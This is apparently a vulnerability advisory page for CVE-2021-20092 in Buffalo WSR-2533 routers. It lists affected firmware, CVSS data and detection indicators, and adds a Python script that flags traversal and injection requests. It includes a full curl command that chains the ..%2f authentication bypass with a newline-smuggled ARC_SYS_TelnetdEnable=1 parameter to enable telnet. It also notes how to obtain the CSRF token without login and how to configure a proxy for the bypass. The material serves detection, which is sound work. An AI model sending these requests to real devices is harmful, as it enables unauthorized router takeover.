CVE-2021-20092
published 2021-04-29


Severity: high, CVSS 3.1 base score 7.5 (Priority P276)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Tags: ITW, Exploit, VulnCheck KEV
Exploited in the wild
EPSS: 8.17% (94.2nd percentile)
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.

Affected (2 ranges)

Vendor    Product                      Version range   Fixed in
buffalo   wsr-2533dhp3-bk_firmware     <= 1.24         (not listed)
buffalo   wsr-2533dhpl2-bk_firmware    <= 1.02         (not listed)

Detection & IOCs (extracted from sources)

url      /images/..%2finfo.html
url      /images/..%2fcgi/cgi_i_filter.js
path     /cgi/cgi_i_filter.js
command  curl --include -X POST http://<router>/apply_abstract.cgi -H "Referer: http://<router>/ping.html" --data "action=start_ping&httoken=<token>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4"
path     /apply_abstract.cgi
path     /loginerror.html
yara     matchers: word header 'application/x-javascript'; word body '/*DEMO*/' AND 'addCfg('

Notes from the sources:
  • The CSRF token parameter is named 'httoken' on Buffalo/Arcadyan devices. It is required for POST requests to /cgi/ endpoints and can be obtained without authentication from /loginerror.html via the getToken() JS function.
  • The HTTP Server banner 'Arcadyan httpd 1.0' identifies Arcadyan-based firmware across multiple vendors' devices; the banner alone does not confirm this CVE (see the model note below).
  • Chained exploit with CVE-2021-20091: a POST to /apply_abstract.cgi whose ARC_ping_ipaddress value contains a newline (%0A) followed by ARC_SYS_TelnetdEnable=1 enables telnet on the device.
  • CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models, whereas CVE-2021-20090 (path traversal authentication bypass) affects the broader list of Arcadyan-based devices.
  • For protected pages to load properly through the bypass, configure proxy match/replace so that every sub-resource request also carries the ..%2f path traversal prefix.
  • Requests to /cgi/ endpoints fail if the Referer header itself contains the ..%2f traversal string; the Referer must point to a clean path (e.g. /loginerror.html or /ping.html).
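The request shapes listed above, as an added detection example that is not code from the advisory, the vendor, or any of the cited sources: Python that parses captured HTTP requests, flags the ..%2f traversal path and the newline-smuggled ARC_SYS_TelnetdEnable write to /apply_abstract.cgi, and applies the listed response matcher to a response. The sample captures, the host 192.0.2.1, the httoken placeholder and the function names are constructed for this example and are not from the page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Traversal prefix in raw, single-encoded or double-encoded form (case-insensitive).
TRAVERSAL_RE = re.compile(r"\.\.(?:/|%2f|%252f)", re.IGNORECASE)

# Constructed sample captures, not real traffic. The host and the httoken value
# are placeholders; the request shapes follow the IOCs listed on this page.
SAMPLE_REQUESTS = [
    # 0: protected page reached through the unauthenticated /images/ directory
    "GET /images/..%2finfo.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    # 1: plain fetch of the token page; on its own this is ordinary traffic
    "GET /loginerror.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    # 2: the telnet-enable chain, same body as the curl command above
    "POST /apply_abstract.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Referer: http://192.0.2.1/ping.html\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=start_ping&httoken=0000&submit_button=ping.html"
    "&action_params=blink_time%3D5&ARC_ping_ipaddress=%0AARC_SYS_TelnetdEnable=1"
    "&ARC_ping_status=0&TMP_Ping_Type=4",
    # 3: a legitimate ping with a real address, which must not be flagged
    "POST /apply_abstract.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Referer: http://192.0.2.1/ping.html\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=start_ping&httoken=0000&submit_button=ping.html"
    "&ARC_ping_ipaddress=192.0.2.50&ARC_ping_status=0&TMP_Ping_Type=4",
]


def parse_request(raw):
    """Split one raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify_request(raw):
    """Return the IOC labels matched by one captured request (empty = no match)."""
    method, target, _headers, body = parse_request(raw)
    path = urlsplit(target).path
    findings = []

    # IOC 1: ..%2f traversal in the path, i.e. a protected page or /cgi/ script
    # reached through a directory the login does not guard.
    if TRAVERSAL_RE.search(path):
        findings.append("traversal-bypass:" + unquote(path))

    # IOC 2: POST to /apply_abstract.cgi whose ARC_ping_ipaddress carries a
    # newline. parse_qs decodes %0A, so the setting smuggled after the newline
    # (ARC_SYS_TelnetdEnable=1 in the chain above) can be reported as well.
    if method == "POST" and path.endswith("/apply_abstract.cgi"):
        params = parse_qs(body, keep_blank_values=True)
        for value in params.get("ARC_ping_ipaddress", []):
            if "\n" in value or "\r" in value:
                smuggled = re.split(r"[\r\n]+", value, maxsplit=1)[1].strip()
                findings.append("apply_abstract-newline-injection:" + smuggled)
                break
    return findings


def matches_bypass_response(headers, body):
    """The matcher listed above applied to one response: some header contains
    'application/x-javascript' and the body contains both '/*DEMO*/' and
    'addCfg(' (how /cgi/cgi_i_filter.js looks when served past the login)."""
    header_hit = any("application/x-javascript" in v.lower() for v in headers.values())
    return header_hit and "/*DEMO*/" in body and "addCfg(" in body


def scan_captures(captures):
    """Map capture index -> findings, keeping only captures that matched."""
    results = {}
    for index, raw in enumerate(captures):
        found = classify_request(raw)
        if found:
            results[index] = found
    return results


if __name__ == "__main__":
    for index, found in scan_captures(SAMPLE_REQUESTS).items():
        print(f"capture {index}: {found}")
```

Only captures 0 and 2 are reported: the traversal path decodes to /images/../info.html, and the ping POST is flagged because its ARC_ping_ipaddress value holds a newline followed by ARC_SYS_TelnetdEnable=1, which a plain regex on the raw body would miss if the newline were double-encoded or split across parameters.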

CVSS provenance

Source      Version   Score   Severity   Vector
NVD         v3.1      7.5     HIGH       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
NVD         v2.0      5.0     MEDIUM     AV:N/AC:L/Au:N/C:P/I:N/A:N
VulnCheck             7.5     HIGH